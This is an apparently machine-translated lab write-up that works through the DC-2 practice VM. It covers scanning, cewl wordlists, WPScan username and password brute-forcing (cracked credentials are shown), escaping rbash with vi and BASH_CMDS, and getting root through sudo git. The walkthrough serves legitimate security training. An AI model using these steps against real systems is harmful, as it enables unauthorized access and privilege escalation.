当前位置:网站首页>Detailed process of DC-2 range construction and penetration practice (DC range Series)
Detailed process of DC-2 range construction and penetration practice (DC range Series)
2022-07-04 16:35:00 【Golden silk】
Catalog
1. Detection target host IP Address
2. Comprehensively detect the target IP
2. User name enumeration explosion
3. Password enumeration explosion
3、 ... and . Host side penetration
2. rbash The escape (Linux A kind of right raising )
1. Dictionary generation tool cewl
2. Scan tool WPScan( Only applicable to WordPress)
DC-2 Range download address http://www.five86.com/downloads/DC-2.zip
Construction process and DC-1 equally , take kali Follow DC-2 Put the same network segment
One . information gathering
1. Detection target host IP Address
arp-scan -l
2. Comprehensively detect the target IP
nmap -A -p- 192.168.120.131
You can see the opening up 80 port http agreement , also 7744 port ssh service
Did not follow redirect to http://dc-2/
Redirection to... Was not followed http://dc-2/
This has to be modified locally DNS Otherwise, you will not be able to access , open etc/hosts file , Add a local DNS
192.168.120.131 dc-2
3. Web information detection
Open it up web page , Browser access 192.168.120.131
Found to have flag Options , find flag1, Click in and translate
Here we are prompted to use cewl Tools generate dictionaries , This level cannot be used as usual cms The vulnerability is exploited ( Don't ask why , I have tried many times but failed to attack )
4. Directory scanning
utilize an instrument dirsearch Scan the website directory
dirsearch -u http://dc-2/ -e * -x 403 404
-u Website address
-e Followed by language , Optional php,asp,*( Indicates all languages ) etc.
-x Indicates the filtered status code , The status will not be displayed after scanning
You can see that a login page is swept out , Let's take a look at
Sure enough, it is the background login interface , Next, we just need to blast out the account and password
Two . Web End penetration
1. Dictionary generation
flag1 It reminds us of , An ordinary dictionary may not be of use , Need to use cewl The tool crawls the information of the target website , Generate the corresponding dictionary
- Refer to the article for usage kali Password attack tools ——Cewl Use guide
cewl http://dc-2/ -w /root/ desktop /dict.txt
Will crawl http://dc-2/ Dictionary generated by website , On the table dict.txt In file
2. User name enumeration explosion
First, let's briefly introduce the tools WPScan, Reference resources Kali( Penetration tools ):WPScan Use
WordPress It is a popular blog website in the world , Many foreign blogs are built with it , But there are many loopholes , Focus on these vulnerabilities and their characteristics , One specifically for this CMS Of WPScan The tools came up
wpscan --url dc-2 -e u
Three user names were scanned , Then we create one on the desktop uname.txt file , Put these user names
admin
jerry
tom
3. Password enumeration explosion
Here we still use tools wpscan, User name dictionary selection uname.txt, Password dictionary selection cewl Generated Dictionary dict.txt
wpscan --url dc-2 -U /root/ desktop /uname.txt -P /root/ desktop /dict.txt
There's something wrong with the explosion jerry and tom Password
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
Then we go in and log in backstage , stay jerry In your account
Get flag2, It also reminds us that we can't pass directly cms Loopholes get shell 了 , Let's find another way
3、 ... and . Host side penetration
1. ssh Protocol remote login
ssh This thing can be used as a tool hydra Get... By blasting , We have already got the user name and password of two accounts , Try it here first , Because it was scanned before ssh The port of 7744, So we can log in with the following command
ssh user name @ The host address -p port
Let's try logging in
ssh [email protected] -p 7744
Back point yes, Continue to enter the password to log in
I found that no matter how I entered the password, it was wrong , No explanation jerry This user is inside , Then we use tom Log in
ssh [email protected] -p 7744
Boarded in , Take a look at the permissions
whoami
Found to have rbash Limit ( It can be understood as a user with very low permissions )
2. rbash The escape (Linux A kind of right raising )
For all specific methods, please refer to rbash Summary of escape methods
So let's see rbash What operations can be carried out after restriction
echo $PATH
# Check the above to get path All files in the path
# Running results /home/tom/usr/bin
echo /home/tom/usr/bin/*
You can see that you can use these four commands , The only useful thing is vi( Editor ) This command , It can be used inside vi Or is it BASH_CMDS Set up shell To bypass rbash, Then set the environment variable add command
- Law 1 :vi Set up shell
Enter the first vi Editor interface
vi
Then press Esc key , Input
:set shell=/bin/bash
Set it up shell And return , Then the input
:shell
enter , start-up shell
When you see the exit vi The editor indicates success , Then let's look at permissions
Has been upgraded to bash 了 , Unable to execute cat The command is due to the problem of environment variables , Add two paths with the following command
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- Law two :BASH_CMDS Set up shell
Set it up shell And implement
BASH_CMDS[x]=/bin/bash
# Set up a x Variable shell
x
# Equivalent to execution shell
We see that there is still a lack of command , Continue to add environment variables
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
next cat once flag file
cat f*
Get flag3, Translate
Prompt us to su once jerry,su yes Linux Switch the user's command
3. su Switching users
su jerry
Just enter the password you got before Log in
Then use the command to find flag file
find / -name *flag*
Well, it seems that except flag4.txt, No permission for other files , Let's see flag4.txt
cat /home/jerry/flag4.txt
It reminds us of git, also root It seems to be an operation to raise rights
4. Git Raise the right
although flag Gave us a hint , But we still have to find something with SUID Permission binary
find / -user root -perm -4000 -print 2>/dev/null
Reference resources A brief talk on SUID Raise the right
Well, there is no usable file , It seems that it can only be used git 了
sudo -l
Find out git Be able to use root Authority , There are two positions for raising power
- The first one is
sudo git help config
Enter and enter
!/bin/bash ( here bash It can also be replaced by sh)
- The second kind
sudo git -p help
Enter
!/bin/bash ( here bash It can also be replaced by sh)
Mention right to success , Then look for flag file
cd /
find / -name *flag*
Then open it
cat /root/final*
wuhu ! Get the final flag
Four . summary
1. Dictionary generation tool cewl
Use crawlers to crawl websites , Generate a dictionary according to the characteristics of the website
cewl website ( Such as https://www.baidu.com) -w file name ( Such as dict.txt)
2. Scan tool WPScan( Only applicable to WordPress)
- User name enumeration
wpscan --url Web site address -e u
-e Represents an enumeration type ,u Represents the user name . The two are used together to enumerate user names
- Code explosion
wpscan --url Web site address -U User name dictionary -P Password dictionary
3. Linux Some orders of
Editor commands
vi( or vim)
It can cooperate with the right raising operation , After going in , Press Esc Key can perform operations , Type in the command
:set shell=/bin/bash(bash It can be used sh Instead of )
:shell
can Getshell
- View environment variables ( It is generally used to view executable commands )
echo $PATH
remember $PATH Value , Like output /home/jerry/bin
echo path Files under path
Here with the above command /home/jerry/bin, It can be like this echo /home/jerry/bin/* View executable commands
- Add environment variables
export PATH=$PATH: route
The environment variable paths of commonly used commands are /usr/bin/ and /bin/
We can add it like this
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- User switching
su user name
Then enter the user name and password
4. rbash The escape
rbash Escape is Linux One of them
- vi/vim Law
vi
Execute commands in the editor , Press Esc
:set shell=/bin/bash
enter , Then open our shell
:shell
Set the environment variable again
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- BASH_CMDS Law
Use it to set up a shell
BASH_CMDS[x]=/bin/bash(bash It can be replaced by sh)
And then execute shell
x
Set the environment variable again
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
边栏推荐
- Model fusion -- stacking principle and Implementation
- Blood cases caused by Lombok use
- Game theory
- Research Report on market supply and demand and strategy of China's Sodium Tetraphenylborate (cas+143-66-8) industry
- Talking about Net core how to use efcore to inject multiple instances of a context annotation type for connecting to the master-slave database
- [North Asia data recovery] a database data recovery case where the partition where the database is located is unrecognized due to the RAID disk failure of HP DL380 server
- Market trend report, technical innovation and market forecast of tetrabromophthalate (pht4 diol) in China
- Market trend report, technical innovation and market forecast of electrochromic glass and devices in China and Indonesia
- 时钟轮在 RPC 中的应用
- What should ABAP do when it calls a third-party API and encounters garbled code?
猜你喜欢
Filtered off site request to
How was MP3 born?
[native JS] optimized text rotation effect
QT graphical view frame: element movement
The 17 year growth route of Zhang Liang, an open source person, can only be adhered to if he loves it
Working group and domain analysis of Intranet
[North Asia data recovery] data recovery case of database data loss caused by HP DL380 server RAID disk failure
Interface fonctionnelle, référence de méthode, Widget de tri de liste implémenté par lambda
Web components series - detailed slides
TypeError: list indices must be integers or slices, not str
随机推荐
[native JS] optimized text rotation effect
Can I "reverse" a Boolean value- Can I 'invert' a bool?
线程池的使用和原理
What is torch NN?
AI system content recommendation issue 24
. Net delay queue
一图看懂ThreadLocal
[book club issue 13] ffmpeg common methods for viewing media information and processing audio and video files
Redis' optimistic lock and pessimistic lock for solving transaction conflicts
多年锤炼,迈向Kata 3.0 !走进开箱即用的安全容器体验之旅| 龙蜥技术
c# 实现定义一套中间SQL可以跨库执行的SQL语句
ECCV 2022放榜了:1629篇论文中选,录用率不到20%
Model fusion -- stacking principle and Implementation
Actual combat | use composite material 3 in application
Summary of database 2
PR FAQ: how to set PR vertical screen sequence?
Ten clothing stores have nine losses. A little change will make you buy every day
Market trend report, technical innovation and market forecast of China's hair repair therapeutic apparatus
[Chongqing Guangdong education] National Open University spring 2019 1248 public sector human resource management reference questions
Blood cases caused by Lombok use